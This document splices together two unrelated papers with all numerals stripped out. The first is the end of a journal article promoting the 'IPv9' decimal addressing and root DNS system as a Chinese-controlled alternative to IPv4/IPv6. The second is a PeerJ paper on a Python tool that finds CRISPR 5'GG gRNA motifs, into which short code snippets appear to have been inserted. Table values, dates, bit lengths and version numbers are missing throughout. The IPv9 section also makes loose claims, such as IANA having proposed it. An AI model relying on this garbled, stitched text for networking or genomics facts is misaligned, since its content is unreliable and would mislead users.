other routers of the same level, only one route pointing to the address segment of [ [ ]/ can realize the ipv address routing of shanghai. according to this logic, only one route is needed from country to country. for example, the route to china is / . the ipv routing table is large and irregular, and the ipv routing table is smaller than ipv , but the ipv routing table contains no geographic information and the routing is messy. ) automatic configuration support ipv adds support for automatic configuration of variable length addresses, which is an improvement and extension of dhcp protocol of ipv , making network management more convenient. ipv supports multicast, and supports the iso/iec c future network << naming and addressing >>tcp/ip/m model, and international journal of advanced network, monitoring and controls volume , no. , supports long packet code streams for virtual and real circuits. this allows multimedia applications on the web to ensure video quality and reduce overhead, provide faster and faster applications such as industrial controls and unmanned vehicles, and provide better and cheaper service over the internet than ipv . ) address length could be select ipv address length has a variety of options, which can realize the change of , , , , , and bit address length, and select the most appropriate address length according to different usage scenarios to reduce the routing overhead. 
) dual encryption the address length of ipv is long enough to realize dual encryption from the transmission of source and target addresses, which plays an important role in some specific network transmission fields. ipv network makes use of logical isolation features to make network information transmission more secure and effective. ) add location information to the address ipv addresses can be embedded with geo-location information, as well as personal and industry id information, this making ip addresses uniquely tied to personal information. ) compatible with previous addresses ipv address is backward compatible with ipv /ipv address. in order to absorb the upgrade difficulty of ipv incompatibility with ipv , ipv protocol remains and unchanged, so that ipv /ipv upgrade to the new version of ipv , the upgrade cost is very low. ) sovereignty is different ipv /ipv addresses spaces and copyright ownership: united states. ipv address space and copyright ownership: china. ipv has its own intellectual property rights and was proposed by the internet assigned numbers authority (iana), but it is china that has succeeded in developing and mastering the core technology. compared with ipv /v , china has the core patent digital domain system of ipv technology, which is of great significance for the future development of china's network and the mastery of the security of cyberspace. c. the construction of ipv protocol the ipv protocol includes message protocol, address protocol, transition protocol, mobile communication protocol, etc, as shown in figure . figure . ipv protocol ) address protocol the ipv network expands the number of address bits to bits, realizing a huge addressing space. and according to different data transmission methods, ipv addresses are divided into three types: unicast, anycast and multicast. in summary, it is the difference between one-to-one, one-to-one recent and one-to-many. unicast type each interface is configured with an identifier, and the packet identifies the identifier to reach the specified interface; an identifier in any on-demand type represents a group of interfaces of different nodes, and the shortest path interface is selected through a routing protocol and transmit the data packet to the interface; multicast is to use the multicast address to send the data packet to each international journal of advanced network, monitoring and controls volume , no. , interface indicated by the identifier, and the shortest path interface will not be selected. ipv uses the "decimalization and brackets" approach in two forms: a) use the complete brackets to represent bits. in this way, the brackets can be ignored when entering a web address in the browser's address bar. b) divide the -bit address into segments, each segment being bits, "a [b] [c] [d] [e] [f] g [h". ipv addresses are very compatible with ipv and ipv . the mapping relationship is shown in table and table . the addresses of ipv and ipv are kept intact in the last bit address segment, and the value of the first address is used as an identifier to point to ipv or ipv . table i. mapping relationship from ipv to ipv address number - - - - length (bits)) mapping [ [ ipv address table ii. mapping relationship from ipv to ipv address number - - - length (bits)) mapping [ [ ipv address for ipv nodes in tunneling technology, they need to be assigned ipv /ipv compatible addresses to communicate with other nodes in the corresponding network. 
the mapping strategy for this situation is shown in table , where the first prefix is , the and values in the token bit correspond to ipv and ipv respectively, and the rest are reserved for future function expansion. table iii. ipv compatibility with ipv /ipv address number - - - - - - - length (bits)) content prefix keep mark scope ipv ipv address ) message protocol table iv. ipv message protocol version number traffic flow type flow label address length priority traffic class address authentication absolute traffic payload length next header limit jump times source address( bit) destination address( bit) time identification code international journal of advanced network, monitoring and controls volume , no. , the total header length of ipv is bytes, which is more than that of ipv but more concise. the format is shown in table , which consists of ten parts: protocol version number, communication flow type, payload length, stream label, next header, hop limit, source address, destination address, time, identification code, etc. in ipv , the optional information of other layers is placed in the extended header between the high-level protocol header and the ipv header, and its structure is shown in table . an ipv packet can carry one or more or even no extension headers, and each subsequent extension header location is marked in its previous header. table v. extension headers ipv header next header=tcp tcp header + data ipv header next header=route ipv header next header=tcp tcp header + data ipv header next header=route ipv header next header=data segment ipv header next header=tcp tcp data segment header + data ) transition protocol the ipv transition protocol specifies the ipv transition header format and the definition of the address text representation, addressing model, and node address, including a detailed description of the currently defined transition header and address format. the header in the transition period uses the original ipv header, and only changes the version number to to distinguish it from the original ipv header. the last two segments of the ipv address are adopted for the interim address, which is bits in total. d. the system architecture of ipv ipv /future network root domain name server system, consisting of a parent root server, a master root server, equal-name root domain name servers named by english n-z, top-level domain name servers of countries and regions like .chn,.usa,.hkg,.mac, routing management systems, application servers and gigabit backbone routers. its working principle is that root domain name servers read the main root server first, then read the parent root server, and after obtaining the data, they will spread to the whole network. only root domain name servers can access this hidden distribution host. this hidden publishing host is maintained. root domain name servers read its data, which is read by the mirror server, and then spread to the entire network. the ipv root domain name server system is shown in figure . the root name server is the highest-level domain name server in the internet domain name system (dns). it is mainly used to manage the internet's home directory, and is responsible for providing authorized domain name server addresses for top level domain tld resolution. it is the necessary infrastructure for constructing the internet. many computer scientists refer to the root domain name server as "truth", which shows its importance. 
currently, the internet's root domain name server, gtld, and cctld are all managed and controlled by icann (internet corporation for assigned names and numbers) authorized by the us government. attacking the root domain name server is the most direct and deadly method of attacking the internet. in the existing internet, the root server is completely controlled by the united states, which poses a great risk to other international journal of advanced network, monitoring and controls volume , no. , countries. the ipv root dns that can adapt to ipv networks, ipv networks, and ipv networks, use decimal network technology to organize, build, secure, controllable, face global users, and serve chinese, english, digital and other languages , and can provide personalized broadband multimedia communication services on the communication network to provide english, digital, chinese domain name resolution function. the ipv resolution system can ensure that the domain used by online users are resolved by the domain server to obtain the ip address of the corresponding access object, which is compatible with the current various domain services. figure . the system of ipv root name server international journal of advanced network, monitoring and controls volume , no. , this root domain name resolution systems based on ipv , able to adapt to ipv network, ipv network, ipv network, through the organization and construction of decimal network technology, with a safe and controllable appearance for global users, and can provide services and personality in various languages provide broadband, multimedia communication service communication network to provide english, digital, chinese domain name resolution function. the ipv resolution system can ensure that the domain names used by online users are resolved by the domain name server to obtain the ip address of the corresponding access object, and can also send requests for non-numeric domain names to the corresponding english domain name server or chinese domain name server, as well as various language domain name servers, while providing digital domain name resolution functions, are also compatible with providing chinese and english domain name resolution services. e. the architecture design of ipv the conventional data packet exchange of the current tcp / ip protocol cannot support true real-time applications and circuit switching, and the application of circuit transmission of sound or images in the four-layer protocol. in addition, the existing tcp / ip protocol is a connectionless and unreliable data packet protocol with a maximum packet length of bytes. with the integration of voice, image and data, the establishment of a new network theoretical foundation has become an urgent task. the design purpose of ipv is to avoid large-scale changes of the existing ip protocol, leading to the next-generation internet can be backward compatible. the main idea of the design is to merge the ip protocol of tcp/ip with circuit switching. using a router compatible with the two protocols, the designer envisions that through a series of protocols, the addresses of the three protocols (ipv /ipv /ipv ) simultaneous use in the internet, gradually replacing the current internet structure without excessively affecting the current internet. due to the rational design of ipv , it has received the attention of iso and the international internet association. 
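The resolution system described in this section is required to remain compatible with existing domain-name services. As a baseline for what that compatibility means, the editorial snippet below performs an ordinary lookup through the conventional DNS resolver chain using only Python's standard library; it does not interact with the decimal-network root servers discussed above, and the queried host name is just a placeholder.

```python
import socket

def resolve(name: str):
    """Return the distinct IPv4/IPv6 addresses a conventional resolver gives for a name."""
    infos = socket.getaddrinfo(name, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

# Any backward-compatible naming system must still answer queries like this one.
print(resolve("example.com"))
```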
) the level system of ipv the ipv system uses a three-layer circuit / four-layer packet hybrid network architecture, and adopts the communication network transmission mode of authentication before communication rules. it was first proposed by china and has formed a demonstration project. the architecture is shown in figure . figure . the level system of ipv international journal of advanced network, monitoring and controls volume , no. , ) the connection of ipv ipv 's tcp / ip / m protocol, in addition to inheriting the existing tcp / ip protocol connectionless and unreliable data packet protocol, also develops absolute code streams and long stream code classes. long packets can reach more than tens of megabytes. can use three layers to directly transmit telephone and cable tv data to establish a four-layer three-layer transmission protocol with the new transmission theory. the connection method is shown in figure . figure . the connection of ipv the ipv network management system is a comprehensive network management system that provides network monitoring and other functions based on a web interface. it can monitor various network parameters and server parameters to ensure the safe operation of the server system; it also supports ipv and ipv protocols, and provides a flexible notification mechanism to allow system administrators to quickly locate and solve various problems. through the use of ipv design routers, clients, protocol conversion routers and other equipment to build a pure ipv network, ipv /ipv hybrid network to achieve a new generation of independent intellectual property security and control of the internet system. including the domestically-controlled and self-controllable ipv /future network root domain name system, promoting technology integration, business integration, and data integration to achieve cross-layer, cross-region, cross-system, cross-department, and cross-business collaborative management and services. take data centralization and sharing as a means to build a nationally integrated national big data center and gateway bureau, speed up the promotion of domestically made independent and controllable alternative plans, and build a safe and controllable information technology system. be independent of the control of the us domain name system and realize an independent domain name system. f. the application examples of ipv ) the application of g-future network/ipv movie network release application now the g network of china unicom beijing and china mobile suzhou have been directly connected through the ipv fiber routing backbone node of international journal of advanced network, monitoring and controls volume , no. , beijing university of posts and telecommunications and the ipv national backbone optical cable network, and achieved the world's first time end-to-end mbps to mbps speed on may this year. on the ipv national backbone network + g local access/ g core network, the digital film program network distribution work was successfully carried out, and the national network distribution of chinese movies was first entered in the new era of "one hour". ) "health tai'an " ipv big data platform "health tai'an "ipv big data platform project relies on the existing backbone optical cable and user transmission access network of shandong broadcast network co. ltd. 
tai'an branch, using ipv network technology to upgrading and construction, cover the medical and health institutions of the city, county, township and village levels and the medical insurance bureau, the administrative department and the finance bureau of tai'an, and further expand to families and individuals. the bandwidth meets the requirements of healthy tai'an big data business and can be sustainable. the expansion realizes compatible security operation between ipv network and ipv network (also realizes logical security isolation between ipv and ipv and ipv networks). iv. conclusion nowadays, the lack of ip addresses has become the main reason restricting its development. ipv has a huge address capacity, and it is better than ipv in terms of security, compatibility, efficiency, and cost savings. it is more suitable in china development. this article introduces the characteristics, production process, protocol and composition of ipv . ipv is independently developed by chinese and has independent intellectual property rights. at the same time, it can solve the remaining problems of ipv and can be the core key technology of the next generation internet. the new network should not be an upgrade of the old network, but a new network system structure. if it can be promoted, it will definitely promote the great development of the internet. reference [ ] information technology-futurenetwork-problem statement and requirement-part : security, iso/iec dtr - , , . [ ] heyudan, zhu lian, etc. commercial radio-frequency identification tag data format. sb/t - , , . [ ] xie jianping, kong ning, etc. domain name specification based on rfid technology used for products and service. sj/t - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession.sj/t - , . . [ ] xie jianping etc. digital domain name specification, sj/t - , . . [ ] xie jianpingetc. a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] tang xiaodan etc. computer operating system (third edition) [m]. xi’an: xidian university press, [ ] xie jianping, xu dongmei, etc. digital domain name specification.sj/t - , . . identification of high-efficiency 'gg grna motifs in indexed fasta files with ngg submitted april accepted october published november corresponding author elisha d. roberson, eroberso@dom.wustl.edu academic editor kjiersten fagnan additional information and declarations can be found on page doi . /peerj-cs. copyright roberson distributed under creative commons cc-by . open access identification of high-efficiency ′gg grna motifs in indexed fasta files with ngg elisha d. roberson departments of medicine & genetics, division of rheumatology, washington university in saint louis, saint louis, mo, united states of america abstract crispr/cas is emerging as one of the most-used methods of genome modification in organisms ranging from bacteria to human cells. however, the efficiency of editing varies tremendously site-to-site. a recent report identified a novel motif, called the ′gg motif, which substantially increases the efficiency of editing at all sites tested in c. elegans. furthermore, they highlighted that previously published grnas with high editing efficiency also had this motif. i designed a python command-line tool, ngg , to identify ′gg grna sites from indexed fasta files. 
as a proof-of-concept, i screened for these motifs in six model genomes: saccharomyces cerevisiae, caenorhabditis elegans, drosophila melanogaster, danio rerio, mus musculus, and homo sapiens. i also scanned the genomes of pig (sus scrofa) and african elephant (loxodonta africana) to demonstrate the utility in non-model organisms. i identified more than million single match ′gg motifs in these genomes. greater than % of all protein coding genes in the reference genomes had at least one unique ′gg grna site overlapping an exon. in particular, more than % of mouse and % of human protein coding genes have at least one unique, overlapping ′gg grna. these identified sites can be used as a starting point in grna selection, and the ngg tool provides an important ability to identify ′gg editing sites in any species with an available genome sequence. subjects bioinformatics, computational biology, data science, databases keywords grna, motif discovery, python, open-source, crispr/cas , ′gg introduction genome engineering allows for the targeted deletion or modification by homology directed repair of a target locus. currently, one of the most popular methods for genome manipulation is the clustered regularly interspaced short palindromic repeat (crispr)/crispr associated protein (cas ) system adapted from streptococcus pyogenes. the s. pyogenes crispr/cas system was initially thought to represent a novel dna repair mechanism, but was eventually found to provide heritable bacterial immunity to invading exogenous dna, such as plasmids and bacteriophages (barrangou et al., ; makarova et al., ). during endogenous crispr/cas function, foreign dna integrates into the crispr locus. the bacterial cell then expresses the pre-crispr rna (crrna) and a trans-activating crrna (tracrrna) that pair to form a complex that how to cite this article roberson ( ), identification of high-efficiency ′gg grna motifs in indexed fasta files with ngg . peerj comput. sci. :e ; doi . /peerj-cs. mailto:eroberso@dom.wustl.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. is cleaved by rnase iii (deltcheva et al., ). the resulting rna is a hybrid of the pre-crrna and the tracrrna, and includes a bp guide rna (grna) sequence. the grna is incorporated into cas and can then guide the cleavage of a complementary dna sequence by the nuclease activity of the cas protein. the topic of crispr-cas genome editing has been reviewed extensively elsewhere (doudna & charpentier, ; hsu, lander & zhang, ; jiang & doudna, ; mali, esvelt & church, ). codon-optimized versions of cas are available for a wide range of organisms, and can easily be synthesized if it is not already available. transfecting cells with cas plasmid along with a fused crrna-tracrrna hybrid construct called a single-guide rna (sgrna) allows for temporary activity of cas . alternatively, cells can also be transfected with a cas protein preloaded with a grna to reduce off target effects (kim et al., ). keeping a stock of plasmids with a sgrna backbone minus the grna site makes it easy to quickly generate new sgrna plasmids by site-directed mutagenesis. 
the cas protein loaded with the sgrna will bind to sites complementary genomic loci, but will only cut it if a protospacer adjacent motif (pam) site immediately follows the complementary sequence (mojica et al., ). the pam site for the commonly-used streptococcus pyogenes type-ii crispr is an ngg motif. therefore, a s. pyogenes cas grna site can be defined as n ngg. it is important to note that constitutively expressed sgrnas typically use a u snrna promoter that strongly prefers a g starting base. for u compatibility, sequences starting with a, c, or t may be used if they are cloned into a sgrna vector with an appended g base, resulting in a bp grna (farboud & meyer, ; ran et al., b), or by incorporating the grna into a trna poly-cistron and taking advantage of trna processing cleavage (xie, minkenberg & yang, ). i will refer to the subset grna sites contain a starting g base (gn ngg) as canonical ′gg grna sites. the rate of editing using the crispr/cas system is far higher than homologous recombination, but higher efficiency is still desirable. the introduction of a longer stem in part the sgrna stem-loop structure and the flip of a single a in a polya track of a separate sgrna stem-loop, called the flip + extension (f + e) sgrna design, resulted in increased cas editing efficiency (chen et al., ). recently, another improvement was reported that increases efficiency. grna sites with a gg motif adjacent to the pam site, called ′gg grnas, have far higher activity than equivalent grna sites in the same region (farboud & meyer, ). these sites take the form of n ggngg. the ′gg motif efficiency in species other than c. elegans is unknown. tools already exist to identify s. pyogenes cas grna targets in sequences via a web interface for an input dna, or for common model organisms (gratz et al., ; heigwer, kerr & boutros, ; liu et al., ; montague et al., ; naito et al., ; stemmer et al., ; xiao et al., ). however, there are limitations to these methods. searching a whole genome for grna sites is not feasible via a web interface unless the genome is exceptionally small. there is already support for most model organisms, but leaves individuals working on less commonly studied species without a resource. in this manuscript, i report a python command-line tool, ngg , for identification of ′gg grna motifs from indexed fasta genome files. as a proof of concept, i report all ′gg grna roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. motifs in model species plus two additional mammalian genomes, identifying more than million sites, of which more than million are unique matches within the reference genome for that species. more than % of all protein coding genes in / species have at least one unique ′gg grna overlapping it for potential editing. materials & methods ngg motif identification i designed ngg using python with compiled regular expressions for the ′gg grna plus pam motif. the use of compiled regular expressions makes the search quite efficient even for relatively large genomes. this tool is python based, relying on the python base functions and some external dependencies, such as the regex and pyfaidx packages. ngg uses the fasta index via pyfaidx (shirley et al., ) to directly seek the genomic target without reading the entire file. the default mode scrapes the entire fasta input for ′gg grna sites, but individual contigs or contig regions can be specified instead. 
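The approach described above (a compiled regular expression applied to sequence fetched through a pyfaidx FASTA index) can be illustrated with a small, self-contained sketch. This is an editorial approximation rather than the tool's actual source code: it assumes the motif is a 20-base protospacer ending in GG followed immediately by an NGG PAM, uses the standard re module instead of the regex package the tool depends on, and takes the FASTA path as a placeholder.

```python
import re
from pyfaidx import Fasta

# Protospacer ending in GG, immediately followed by an NGG PAM (assumed motif form).
# The lookahead keeps overlapping sites.
GG_MOTIF = re.compile(r"(?=([ACGT]{18}GG)([ACGT]GG))")

COMPLEMENT = str.maketrans("ACGT", "TGCA")

def revcomp(seq: str) -> str:
    """Reverse complement of an upper-case DNA string."""
    return seq.translate(COMPLEMENT)[::-1]

def scan_contig(name: str, seq: str):
    """Yield (contig, start, strand, guide, pam); start is the 0-based leftmost
    reference coordinate of the 23 bp site on either strand."""
    seq = seq.upper()
    for strand, text in (("+", seq), ("-", revcomp(seq))):
        for m in GG_MOTIF.finditer(text):
            guide, pam = m.group(1), m.group(2)
            start = m.start(1) if strand == "+" else len(seq) - m.end(2)
            yield name, start, strand, guide, pam

# Placeholder genome file; pyfaidx builds/uses the .fai index rather than
# reading the whole file into memory.
genome = Fasta("genome.fa")
for contig in genome.keys():
    for hit in scan_contig(contig, str(genome[contig][:])):
        print(*hit, sep="\t")
```

A canonical-site filter would simply keep guides whose first base is G.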
ngg identifies these sites on both the sense and antisense strands independently for each chromosome, facilitating multiprocessing to decrease computation time. ngg buffers all detected grna sites in memory, and then identifies uniqueness by storing the grna sites in a dictionary. this means that all unique sites will be appropriately flagged, but near matches, i.e., single-base mismatches will not. the output from this tool could be pipelined with other tools, or further extended with biopython to allow for identification of near matches as they are beyond the scope of this tool. the output can be extended to include non-canonical sites starting with any base. ngg output includes the contig name, start and end positions, the grna sequence, the pam sequence, whether the site starts with a g, and whether the grna sequence was unique in the searched region. for a whole-genome this is very handy, but be aware that selecting only a small region will only tell you if a grna is unique within the region, not the genome. the source code for ngg is available from github. multi-species site identification i used ngg to identify all ′gg grna motifs commonly studied organisms and two others: saccharomyces cerevisiae, caenorhabditis elegans, drosophila melanogaster, danio rerio, mus musculus, homo sapiens, sus scrofa, and loxodonta africana. i used a gnu make script to download genomes and gtf gene annotations, calculate genome gc content, and annotate genes in r to enable reproducibility. the makefile downloads the top-level or primary assembly genomes from ensembl release , runs ngg on all contigs for each fasta file, and calculates gc content for each genome. i based the gc content of each genome from non-n base content. after identifying grna sites, i used r, particularly relying on the plyr, dplyr, tidyr, magrittr, genomicranges, and genomicfeatures packages, to identify the overlap of each grna with gene exons and tabulate the number of genes overlapping at least one grna (lawrence et al., ; r core team, ). a grna was considered overlapping a gene if at least one base of grna sequence overlapped at least one base of exonic sequence. the best roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table count of grna classes in each species. all n ggngg motifs are included in the ‘all grnas’ section, while only canonical grnas starting with a g are in the ‘canonical grnas’ section. the ‘all’ class accumulates all matching motifs for that section, while the ‘unique’ class counts only sites with on exact match in the reference genome. all grnas canonical grnas all unique all unique s. cerevisiae , , , , c. elegans , , , , d. melanogaster , , , , d. rerio , , , , , , m. musculus , , , , , , , , s. scrofa , , , , , , , , h. sapiens , , , , , , , , l. africana , , , , , , , , total , , , , , , , , case puts the cut site within the exon body and should certainly disrupt the gene. the worst case of a bp overlap cutting in an intron should still generate indels big enough to extend into the exon or to delete a canonical splice site. i calculated all summary statistics and generated ggplot figures using rstudio (v . . ) markdown with knitr (xie, ). results ′gg grna sites are common in each species overall, i identified greater than million ′gg grna sites in the tested genomes (table ). some of these grna sequences were not unique in a given genome, leaving more than million unique ′gg sites. 
approximately million of the million unique sites were canonical g starting motifs. the sites identified in each species, with the grna sequence, pam sequence, genome coordinates, annotated overlapping genes, and number of perfect genome matches, are available for download (roberson, ). the r scripts, python files, and make files are also available in a public repository for reproducibility. the genomes i analyzed had vastly different sizes, ranging from approximately mb for yeast to greater than gb for humans and elephants, and as a result had dramatically different numbers of ′gg grna sites per genome. therefore, i also assessed the site density per megabase of reference genome size (table ). unique sites with a g starting base averaged a density of , sites/mb, or site per bp. all unique sites averaged , sites/mb, or unique ′gg grna site per bp. d. rerio had the lowest density at unique g-start sites/mb, while d. melanogaster had the highest density at , unique sites/mb. the low density of unique sites in zebrafish may be due to genome complexity from previous duplication events.
table ′gg grna sites per megabase genome size. reference genome size was determined from the species fasta index. the number of unique ′gg grna sites in the genomes is encouraging, with an average across all species of one unique site per kb of genome. (columns: all and unique densities for all grnas and for canonical grnas; rows: s. cerevisiae, c. elegans, d. melanogaster, d. rerio, m. musculus, s. scrofa, h. sapiens, l. africana.)
i profiled the performance of canonical g-start grna searches in each of the tested genomes for both block and exhaustive scans using one and multiple cpus (table ). the parallelization in this program is by contig and strand, so the maximum utilized number of threads would be twice the number of contigs.
table run times with one and multiple cpus. profiling was performed using python v . . using or processors on a server with intel i - k processors and gb of ram. canonical grnas were searched for benchmark purposes. when possible, it is clearly advantageous to use multiple processors to accelerate grna searches. (columns: block and exhaustive scan times with one and multiple cpus, with the relative delta; rows: the eight species.)
using multiple cpus reduced runtimes by approximately – % in all cases. it is worth noting that exhaustively scraping the human genome for canonical sites took only . s with multiple cpus, and even the longest search took only . s for sus scrofa.
little strand bias observed for canonical ′gg grna sites
the strand of each grna site with respect to the reference was included in the ngg output files. for each organism, i considered every grna site as an independent bernoulli trial with a % probability of a “sense” strand designation as a successful trial outcome (table ). / species showed strand bias for all grna sites (c. elegans, d. melanogaster, d. rerio, h. sapiens, l. africana). only c. elegans and h. sapiens demonstrated strand bias significantly different from the expected ratio for canonical ′gg sites.
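the bernoulli-trial test just described can be sketched with standard python statistics libraries (the original analysis was done in r). in the snippet below the counts mapping and the strand_bias_tests helper are hypothetical, while binomtest and multipletests are real scipy and statsmodels calls.

```python
# Sketch of the strand-bias test: each gRNA site is a Bernoulli trial with an
# expected 50% chance of landing on the sense strand.
from scipy.stats import binomtest
from statsmodels.stats.multitest import multipletests

def strand_bias_tests(counts, expected=0.5):
    """counts: {species: (sense_sites, total_sites)} -- hypothetical input layout."""
    species = sorted(counts)
    pvals, estimates = [], []
    for name in species:
        sense, total = counts[name]
        result = binomtest(sense, n=total, p=expected)   # exact binomial test
        estimates.append(sense / total)
        pvals.append(result.pvalue)
    # Benjamini-Hochberg false-discovery-rate correction across species
    _, padj, _, _ = multipletests(pvals, method="fdr_bh")
    return {name: (est, p, q)
            for name, est, p, q in zip(species, estimates, pvals, padj)}
```

swapping the expected probability for the genome-wide gc fraction gives the same kind of test applied to pam composition in the next section.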
while the difference in strand selection is significant, it may be unimportant to editing site selection. wildtype cas cleaves both dna strands simultaneously, and therefore the strand of the target roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table strand bias for grna sites. the grna type is either all ′gg sites or only canonical g starting grna sites. the estimate column is the estimated rate of positive strand selection observed. the p-value column is detected for whether the bernoulli trial estimates differ significantly a / strand selection, and the adjusted p-value is based on a benjamini–hochberg false-discovery rate correction. grna type species estimate p. value p. adj all saccharomyces cerevisiae . . e− . e+ caenorhabditis elegans . . e− . e− drosophila melanogaster . . e− . e− danio rerio . . e− . e− mus musculus . . e− . e+ homo sapiens . . e− . e− loxodonta africana . . e− . e− sus scrofa . . e− . e+ canonical saccharomyces cerevisiae . . e− . e+ caenorhabditis elegans . . e− . e− drosophila melanogaster . . e− . e+ danio rerio . . e− . e− mus musculus . . e− . e− homo sapiens . . e− . e− loxodonta africana . . e− . e+ sus scrofa . . e− . e+ sequence doesn’t matter. strategies that employ dual nickases to reduce off target effects could be affected by such bias, as they require two separate grna sites on opposite strands (ran et al., a). the difference observed is less than . % different from expected % ratio, and whether this functionally affects the ability to choose paired ′gg grnas remains to be seen. cgg & ggg pam sites are underrepresented i visualized the distribution of the four pam sites (agg, cgg, ggg, tgg) as a stacked bar chart of each sites proportion of the total identified sites in each species (fig. ). in general, the agg and tgg sites represented the majority of ′gg grna sites in all species. i tested whether pam site distribution differed from chance based on the gc content of the reference genome. for each species, i considered each pam site a bernoulli trial, and defined success as either cgg or ggg site identity. the probability of success was set equal to the estimated genome-wide gc content calculated from the reference genome, excluding n bases (table ). none of the tested genomes met the expected gc success rate. the rate of picking a cgg or ggg pam was less than the genome gc content in s. cerevisiae, m. musculus, sus scrofa, loxodonta africana, and h. sapiens. in particular, the estimate for m. musculus, h. sapiens, and loxodonta africana was > % different from the genome gc fraction. this is not necessarily unexpected. the cgg pam site includes a ′ cpg dinucleotide that is generally underrepresented due to the relatively high frequency of methyl-cytosine deamination to thymine. c. elegans, d. melanogaster, and d. rerio were the exceptions, with cgg and ggg pam selection greater than the expected frequency. roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pam site usage across tested species. each species has four potential protospacer adjacent motifs (pam) possible for identified grna sites. the stacked bar chart shows the fraction of all pam sites each motif occupies. the cgg motif, that includes a cpg dinucleotide, is the least prevalent motif in the zebrafish, mouse, human, elephant, and pig genomes. however, c. 
elegans may not be unexpected, as it lacks dna methylation and would not necessarily be at an advantage to limit cpg dinucleotides. most protein coding genes overlap at least one unique ′gg grna a common use of genome engineering is to knock out or otherwise modify the function of a protein coding gene. the efficiency of such edits is critical, as just introducing frame-shifting mutations can require screening a large number single-cell clones or derived animals to identify a successful edit. as part of this study, i annotated for each grna in the species if there was any overlap with a gene. conversely, i also annotate a count of how many of each of the four classes (all sites, all unique sites, canonical sites, and unique canonical sites) overlap every gene. no less than % of any species’ genes overlap at least one unique ′gg grna (table ). this catalog of potential sites demonstrates that most protein coding genes can be targeted by at least one ′gg grna site to achieve high editing efficiency. discussion in this manuscript, i have described a new tool for identifying ′gg grna sites and presented a catalog of potential editing sites in species. importantly, many genomic loci roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table pam site frequency compared to genome gc content. the average genome gc content and the estimated chance of picking a gc pam site (cgg or ggg) are shown for each species. gc content was calculated from the downloaded reference files. grna type species gc estimate p. value p. adj all saccharomyces cerevisiae . . . e− . e− caenorhabditis elegans . . . e− . e− drosophila melanogaster . . . e− . e− danio rerio . . . e− . e− mus musculus . . . e− . e− homo sapiens . . . e− . e− loxodonta africana . . . e− . e− sus scrofa . . . e− . e− canonical saccharomyces cerevisiae . . . e− . e− caenorhabditis elegans . . . e− . e− drosophila melanogaster . . . e− . e− danio rerio . . . e− . e− mus musculus . . . e− . e− homo sapiens . . . e− . e− loxodonta africana . . . e− . e− sus scrofa . . . e− . e− table fraction of genes overlapping at least one grna. ensembl gtf files were used to annotate overlap of grna sites with known genes. a gene was called as potentially cut if at least one grna overlapped at least base with an exon of that gene. most genes in the species have at least one unique cut per gene. all motifs canonical motifs species all unique all unique s. cerevisiae . . . . c. elegans . . . . d. melanogaster . . . . d. rerio . . . . m. musculus . . . . s. scrofa . . . . h. sapiens . . . . l. africana . . . . can be targeted by unique ′gg grna sites. the efficiency of ′gg grna sites in species other than c. elegans has yet to be established, but is worth further study. this tool reports the uniqueness of identified sites, but blast searching of potential grna sequences is warranted to identify near-match sites. it is also important to consider the target genome’s specific genotypes when designing a grna. in particular, variants that alter pam sites away from ngg will not be cleaved by cas even if the grna is an exact match. roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the accuracy of editing can be improved by using two grnas and a mutant cas nickase. i observed significant, but low-effect strand bias in these genomes. this may lead to some loci not being compatible with paired ′gg grna sites. 
when possible, choosing paired ′gg grna sites should be strongly considered. efficiencies of less than % were increased to % efficiency or greater by using the ′gg strategy (farboud & meyer, ). as such, using paired ′gg grnas with a nickase may give the best of both worlds with both high accuracy and high efficiency. it is important to note that ngg will operate on any indexed fasta file. many grna site finding tools are limited to catalogs of grna sites in model organisms. this tool fills an important gap for individuals working outside of commonly used species, demonstrated by the use of ngg on the genomes of s. scrofa and l. africana. the provided grna site survey and associated tool, ngg , represent a valuable resource for designing genomic modification strategies. acknowledgements i wish to thank dr. li cao for her helpful comments during the preparation of this manuscript, and dr. matthew shirley for his suggested use of pyfaidx. additional information and declarations funding a portion of effort spent on designing this software was supported under nih p ar as an activity of the human genomics and bioinformatics facility in the washington university rheumatic disease core center. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: nih: p ar . competing interests i have no competing interests related to this manuscript or tool. author contributions • elisha d. roberson conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/robersonlab/ngg https://github.com/robersonlab/ ngg manuscript http://dx.doi.org/ . /m .figshare. . roberson ( ), peerj comput. sci., doi . /peerj-cs. 
references
barrangou r, fremaux c, deveau h, richards m, boyaval p, moineau s, romero da, horvath p. . crispr provides acquired resistance against viruses in prokaryotes. science : – doi . /science. .
chen b, gilbert luke a, cimini ba, schnitzbauer j, zhang w, li g-w, park j, blackburn eh, weissman js, qi ls, huang b. . dynamic imaging of genomic loci in living human cells by an optimized crispr/cas system. cell : – doi . /j.cell. . . .
deltcheva e, chylinski k, sharma cm, gonzales k, chao y, pirzada za, eckert mr, vogel j, charpentier e. . crispr rna maturation by trans-encoded small rna and host factor rnase iii. nature : – doi . /nature .
doudna ja, charpentier e. . the new frontier of genome engineering with crispr-cas . science : doi . /science. .
farboud b, meyer bj. . dramatic enhancement of genome editing by crispr/cas through improved guide rna design. genetics : – doi . /genetics. . .
